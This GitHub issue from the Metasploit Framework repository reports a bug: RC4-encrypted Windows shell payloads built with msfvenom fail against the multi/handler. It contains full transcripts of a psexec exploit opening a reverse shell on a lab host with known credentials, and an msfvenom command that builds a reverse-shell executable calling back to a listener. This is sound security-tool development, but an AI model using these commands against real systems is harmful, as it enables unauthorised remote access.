RC4 windows shell payloads broken when using venom #12512

Open
bwatters-r7 opened this issue Oct 30, 2019 · 1 comment
Labels: bug, confirmed (Issues confirmed by a committer), msfvenom, payload

Comments

bwatters-r7 (Contributor) commented Oct 30, 2019

It appears that RC4 encrypted shell payloads built with venom are incompatible with rc4 encrypted handlers in framework? Automated testing suggests this is something across both staged and stageless x86 and x64 windows shell payloads. (Unsure if this is also a mettle problem)

This is not the case with rc4 encrypted payloads created by framework for use in exploits; those appear to work. It is only when you build the payload in venom and call back to a multi/handler.

Meterpreter sessions do not appear to be affected.

Works fine as part of an exploit:

msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.134.164  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               vagrant          no        The password for the specified username
   SMBUser               vagrant          no        The username to authenticate as


Payload options (windows/x64/shell/reverse_tcp_rc4):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXITFUNC     thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT        4567             yes       The listen port
   RC4PASSWORD  msf              yes       Password to derive RC4 key from


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > set rc4password secret
rc4password => secret
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] 192.168.134.164:445 - Connecting to the server...
[*] 192.168.134.164:445 - Authenticating to 192.168.134.164:445 as user 'vagrant'...
[!] 192.168.134.164:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.164:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.164:445 - PowerShell found
[*] 192.168.134.164:445 - Selecting PowerShell target
[*] 192.168.134.164:445 - Powershell command length: 2788
[*] 192.168.134.164:445 - Executing the payload...
[*] 192.168.134.164:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Obtaining a service manager handle...
[*] 192.168.134.164:445 - Creating the service...
[+] 192.168.134.164:445 - Successfully created the service
[*] 192.168.134.164:445 - Starting the service...
[*] Sending stage (340 bytes) to 192.168.134.164
[+] 192.168.134.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.164:445 - Removing the service...
[+] 192.168.134.164:445 - Successfully removed the service
[*] 192.168.134.164:445 - Closing service handle...
[*] Command shell session 1 opened (192.168.135.168:4567 -> 192.168.134.164:49945) at 2019-10-30 06:38:03 -0500

ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : moose
   IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:4cd1:ef19:f75f:fe57
   IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:ffff:defb:a366:5d3
   Temporary IPv6 Address. . . . . . : fd34:fe56:7891:2f3b:38f0:fd27:85f1:52ab
   Link-local IPv6 Address . . . . . : fe80::4cd1:ef19:f75f:fe57%4
   IPv4 Address. . . . . . . . . . . : 192.168.134.164
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::21b:21ff:fe36:e9b5%4
                                       192.168.134.254

C:\Windows\system32>exit
exit

Fails when using venom:

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/shell/reverse_tcp_rc4 -f exe -o winshellrc4.exe RC4PASSWORD=secret LHOST=192.168.135.168 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 458 bytes
Final size of exe file: 73802 bytes
Saved as: winshellrc4.exe

msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_rc4
payload => windows/shell/reverse_tcp_rc4
msf5 exploit(multi/handler) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > set rc4password secret
rc4password => secret
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.134.164
[*] Command shell session 2 opened (192.168.135.168:4567 -> 192.168.134.164:51479) at 2019-10-30 06:49:00 -0500

ipconfig







ipconfig







^C

I'm on commit b7acbfe

space-r7 added the confirmed (Issues confirmed by a committer) label Nov 1, 2019

space-r7 (Contributor) commented Nov 1, 2019

I tested this out yesterday and got the same results:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_rc4
payload => windows/shell/reverse_tcp_rc4
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > set rc4password secret
rc4password => secret
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.37.136
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49160) at 2019-10-31 09:42:57 -0500
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.37.136
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2019-10-31 09:42:57 -0500

whoami


background

Background session 2? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell windows                   192.168.37.1:4444 -> 192.168.37.136:49160 (192.168.37.136)
  2         shell x86/windows               192.168.37.1:4444 -> 192.168.37.136:49161 (192.168.37.136)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

[*] 192.168.37.136 - Command shell session 1 closed.
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

whoami

net users
